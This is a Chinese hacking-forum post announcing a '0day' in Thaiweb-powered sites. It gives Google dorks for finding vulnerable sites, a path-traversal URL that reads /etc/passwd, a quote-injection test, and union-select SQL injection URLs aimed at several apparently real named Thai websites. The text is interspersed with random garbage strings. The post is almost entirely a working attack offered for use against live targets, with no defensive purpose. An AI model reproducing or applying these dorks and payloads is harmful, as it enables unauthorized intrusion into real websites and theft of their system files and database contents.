找回密码
 立即注册
查看: 2468|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:/ p9 J+ U- g4 O/ Y; b: D' G* E

6 L, C  T. P" H/ I3 k9 F  V- vintext:powered by Thaiweb' n0 A9 n$ Y" X0 W# ]% s" N: w0 D7 P
: f2 S5 o# Y' I" h2 I; X
inurl:index.php?page=board.php
2 ]! U, q7 A6 `9 T" ]! U4 F$ _# s6 {

) c4 T7 t$ I) e9 S; Q6 R
6 {$ d+ V# F9 }% E, J0 [5 @6 _利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd$ M! y0 g6 T" n
4 S$ C( v  k! E* N$ D. _, O. C
" ?! D/ C7 K$ N4 ^- e) d

. p* C7 {9 [: E利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
2 B3 M$ d& }5 K" k5 I0 p
! i" W  J  I+ y. H5 v 4 S( R  _6 n7 w' \" C! E
5 p- v; V4 z! `! K
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--; h3 e) q% v5 M% H7 J0 Y: r
8 [. ~/ m/ N' U5 @& \1 |7 r9 y: }
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--. P- S/ |! s/ ^, ]

+ {& t5 Y7 ~7 f. `* W, O! jhttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
- C$ Q/ g. B3 e6 J
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表